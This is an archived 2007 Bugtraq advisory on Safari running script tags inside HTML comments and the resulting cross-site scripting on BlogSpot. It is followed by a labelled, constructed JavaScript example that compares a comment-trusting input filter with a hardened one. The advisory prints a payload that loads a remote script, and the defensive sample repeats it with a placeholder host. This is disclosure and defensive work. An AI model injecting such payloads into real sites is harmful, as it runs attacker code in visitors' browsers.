Open Source and information security mailing list archives
 
Date: Tue, 23 Jan 2007 00:44:13 -0700
From: Jose Avila III <jose@...ra.com>
To: bugtraq@...urityfocus.com
Cc: Jose Avila <jose@...ra.com>
Subject: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability

Overview:

Safari on occasions may improperly parse the source of an HTML  
document, which can lead to the execution of html tags within  
comments. This can become dangerous when input filters allow html  
tags within comments, as they will get parsed and executed under  
certain circumstances.

Details:

In some cases you can cause Apple's Safari browser to execute code  
when it should not be executed. In the following example everything  
within the comment, in theory should never be executed; however,  
Safari decides to execute the script tag.

<title>myblog<!--</title></head><body><script src=http://beanfuzz.com/bean.js> --></title>

Blogs hosted on BlogSpot.com have filter mechanisms for their input;  
however, they will allow you to inject anything within comments. This  
made it possible to cross site script blogspot.com. Note: Only Safari  
viewers will be affected.

Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99

Vendor Response:

I was unable to get a response from the vendor in regards to this issue.

Questions / Comments:
Jose (at) onzra (dot) com

----
Register for my RSA 2007 Training Course
"Creative Web Protocol Attacks, Beyond Web Hacking"
February 4, 5 2007 San Francisco
https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp
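
The filter weakness described in the post, shown from the defender's side as an added example (not code from the original post or from BlogSpot): a filter that escapes markup but passes HTML comments through verbatim, next to one that drops comments before escaping. The function names and the sample string with its placeholder host are assumptions constructed for illustration.

```javascript
// Constructed sample modelled on the title/comment pattern in the post (placeholder host).
const SAMPLE = 'myblog<!--</title></head><body><script src=//example.invalid/x.js> -->';

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ENTITIES[c]);

// Split input into comment and non-comment spans.
// An unterminated "<!--" is treated as a comment that runs to end of input.
function splitComments(input) {
  const spans = [];
  let pos = 0;
  while (pos < input.length) {
    const open = input.indexOf('<!--', pos);
    if (open === -1) {
      spans.push({ comment: false, text: input.slice(pos) });
      break;
    }
    if (open > pos) spans.push({ comment: false, text: input.slice(pos, open) });
    const close = input.indexOf('-->', open + 4);
    const end = close === -1 ? input.length : close + 3;
    spans.push({ comment: true, text: input.slice(open, end) });
    pos = end;
  }
  return spans;
}

// Weak filter (hypothetical): escapes markup outside comments but trusts comment
// bodies, assuming every browser treats them as inert.
function weakFilter(input) {
  return splitComments(input)
    .map((s) => (s.comment ? s.text : escapeHtml(s.text)))
    .join('');
}

// Hardened filter (hypothetical): drops comment spans entirely, then escapes what
// is left, so the output never depends on how a browser tokenizes comments.
// Escaping after removal also neutralizes any "<!--" reassembled by the removal.
function hardenedFilter(input) {
  const kept = splitComments(input)
    .filter((s) => !s.comment)
    .map((s) => s.text)
    .join('');
  return escapeHtml(kept);
}

console.log('weak    :', weakFilter(SAMPLE));
console.log('hardened:', hardenedFilter(SAMPLE));
```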



